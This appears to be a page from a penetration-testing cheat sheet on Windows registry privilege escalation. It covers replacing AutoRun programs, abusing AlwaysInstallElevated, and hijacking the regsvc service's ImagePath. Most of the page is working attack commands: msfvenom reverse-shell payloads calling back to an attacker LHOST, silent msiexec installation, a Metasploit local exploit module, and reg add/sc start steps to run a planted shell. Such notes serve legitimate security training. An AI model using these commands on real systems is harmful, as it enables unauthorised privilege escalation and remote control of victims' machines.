Registry

AUTORUN:

You will get a list of AutoRun programs from your enumeration scripts. It is shown under AutoRun applications in winPEAS. Check if those programs have RW access. Create a malicious executable of the AutoRun program and replace the original one. This however requires a restart of the machine for the AutoRun to give you a shell. This means that, you will only get a shell when the Administrator logs into his account. The administrator receives a prompt to run a program. Once he accepts the prompt, you will get a reverse shell.

ALWAYS INSTALL ELEVATED:

There are packages in Windows called msi packages. Msi packages are basically Windows installers. For the exploit to work, you need to have 2 registry settings enabled.

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Check for both if AlwaysInstallElevated is set to 1.

METHOD 1:

Run PowerUp.ps1 and use the Abuse function to add a user or perform some other task

METHOD 2:

Create a metasploit reverse shell. Transfer it to the machine. Run it. 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f msi -o shell.msi
#Transfer it to victim machine and run:
msiexec /quiet /qn /i C:\Temp\setup.msi

METHOD 3:

#Get a meterpreter shell
#Background the session: background
#Use exploit
use exploit/windows/local/always_install_elevated
#Then set the SESSION that was in background

REGSVC:

winPEAS: Looking if you can modify any service registry

#Suppose that the registry is:
HKLM\system\currentcontrolset\services\regsvc (Interactive [TakeOwnership])

#Verify the permissions of the service:
#CMD
accesschk /accepteula -uvwqk HKLM:\System\CurrentControlSet\Services\regsvc

#POWERSHELL
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List

#Check if we can start the service
accesschk /accepteula -ucqv user regsvc

#Query the service info
reg query HKLM:\System\CurrentControlSet\Services\regsvc

#Create a reverse shell and transfer it to C:\Temp
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f exe -o shell.exe

#Run the following command
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\shell.exe /f

#Start a listener and the service
sc start regsvc

PreviousExecutable FilesNextRun As

Last updated

Was this helpful?